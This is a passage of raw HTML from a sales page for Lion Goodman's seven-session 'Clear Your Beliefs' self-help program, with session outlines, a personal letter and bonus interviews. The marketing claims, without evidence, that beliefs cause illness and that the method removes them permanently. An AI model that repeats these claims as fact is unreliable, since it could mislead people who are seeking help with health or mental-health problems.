inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.</p>\n<p><strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<p>&nbsp;</p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p>The same thing is true in your subconscious mind:</p>\n<p><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></p>\n<p><strong>It''s that simple.</strong></p>\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\n<p>When you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Beliefs Are Difficult To Change</h1>\n\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n<p>&nbsp;</p>\n<h1>Why We React The Way We Do</h1>\n\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\n</p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<p><em></p>\n\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p>\n\n<p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n<p>&nbsp;</p>\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n\n<p><strong>Can you imagine this?</strong></p>\n<p><img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" /></p>\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n<p>&nbsp;</p>\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n<p>&nbsp;</p>\n<h1>Clear Whatever Is In The Way</h1>\n\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n<p>&nbsp;</p>\n<h1>Is This A Guaranteed Cure-All?</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n<p>&nbsp;</p>\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n<p>&nbsp;</p>\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\n<p>\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n<p>&nbsp;</p>\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n<p>In gratitude, and with warm wishes for your total success,</p>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a></p>\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n<p>&nbsp;</p>\n<h1>Register Today and Discover What''s Possible</h1>\n\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n<p>&nbsp;</p>\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> 